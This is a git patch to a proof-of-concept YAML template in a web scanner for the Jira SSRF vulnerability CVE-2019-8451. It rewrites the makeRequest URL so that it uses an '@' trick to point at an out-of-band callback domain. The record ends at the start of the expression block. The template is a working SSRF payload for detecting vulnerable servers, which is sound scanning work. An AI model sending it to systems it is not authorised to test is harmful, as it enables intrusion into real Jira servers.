From 58890cd5e60b0f8e10258331590a50d18a896656 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BD=B1=E8=88=9E=E8=80=85?= Date: Fri, 5 May 2023 23:31:28 +0800 Subject: [PATCH] update --- WebScan/pocs/jira-ssrf-cve-2019-8451.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/WebScan/pocs/jira-ssrf-cve-2019-8451.yml b/WebScan/pocs/jira-ssrf-cve-2019-8451.yml index 12c75ce..4e873ad 100644 --- a/WebScan/pocs/jira-ssrf-cve-2019-8451.yml +++ b/WebScan/pocs/jira-ssrf-cve-2019-8451.yml @@ -3,12 +3,11 @@ set: reverse: newReverse() originScheme: request.url.scheme originHost: request.url.host - reverseHost: reverse.url.host - reverseURL: reverse.url.path + reverseURL: reverse.domain rules: - method: GET path: >- - /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}} + /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseURL}} headers: X-Atlassian-Token: no-check expression: |